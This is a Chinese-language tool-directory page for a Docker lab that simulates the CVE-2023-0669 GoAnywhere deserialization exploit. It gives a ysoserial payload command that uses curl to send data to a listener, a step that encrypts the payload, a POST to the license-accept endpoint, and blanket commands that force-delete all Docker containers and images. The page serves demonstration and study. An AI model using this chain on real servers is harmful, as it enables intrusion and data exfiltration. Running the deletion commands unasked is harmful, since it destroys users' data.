Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2023-0669-simulation — 针对 CVE-2023-0669 的模拟环境,包含基于 Docker 的攻击者、易受攻击的服务器和监听器容器。演示反序列化漏洞利用生成、负载加密和数据外泄。 | Kitploit
工具/GitHubGitHub/zakaria-laouani/cve-2023-0669-simulation
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用数据泄露命令与控制
GitHubzakaria-laouani/cve-2023-0669-simulation

cve-2023-0669-simulation

针对 CVE-2023-0669 的模拟环境,包含基于 Docker 的攻击者、易受攻击的服务器和监听器容器。演示反序列化漏洞利用生成、负载加密和数据外泄。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
78个月前尚未审核

项目结构

cve-2023-0669-simulation/ ├── docker-compose.yml ├── attacker/ │ ├── Dockerfile │ └── CVE_2023_0669_helper.java ├── vulnerable/ │ ├── Dockerfile │ └── VulnerableServer.java ├── listener/ │ ├── Dockerfile │ └── server.py └── received/ ← 自动创建(数据外泄)

2. 启动 3 个容器(攻击者、受害者、监听器)

docker-compose up --build

问题:执行 docker compose up 时出现 KeyError: 'ContainerConfig' 错误

本项目要求:

  • Docker 引擎:v24 或 v25 及以上
  • Docker Compose:v2.20+(Docker 已自动包含) KeyError: 'ContainerConfig' 出现在 docker compose up 时,通常是由于过期或损坏的 Docker 元数据,或旧镜像引起。 删除损坏的容器、镜像和元数据:

docker compose down --remove-orphans

docker rm -f $(docker ps -aq)

docker rmi -f $(docker images -q)

然后重新干净构建:

docker compose build --no-cache

docker compose up

3. 进入攻击者容器

docker exec -it attacker bash

生成安全载荷(仅发送一条消息)```

java -jar ysoserial-all.jar CommonsCollections6 'curl -s http://listener:8080/receive -d "PWNED-CVE-2023-0669-simulation-$(date)"' > payload.ser

加密载荷

java CVE_2023_0669_helper payload.ser 1

→ 复制显示的长字符串(Ctrl+A 然后 Ctrl+C)

发送漏洞利用(将 LA_CHAINE 替换为你刚复制的内容)

curl -X POST http://vulnerable:8001/goanywhere/lic/accept
-d "encryptedLicenseResponseData=LA_CHAÎNE_BASE64_ICI"
-d "acceptLicense=true"

7. 立即结果

你将在监听器的日志中(或你电脑上的 ./received 文件夹中)看到:

PWNED ! 收到 42 字节 → PWNED-CVE-2023-0669-simulation-星期六 2025年12月06日...

下载工具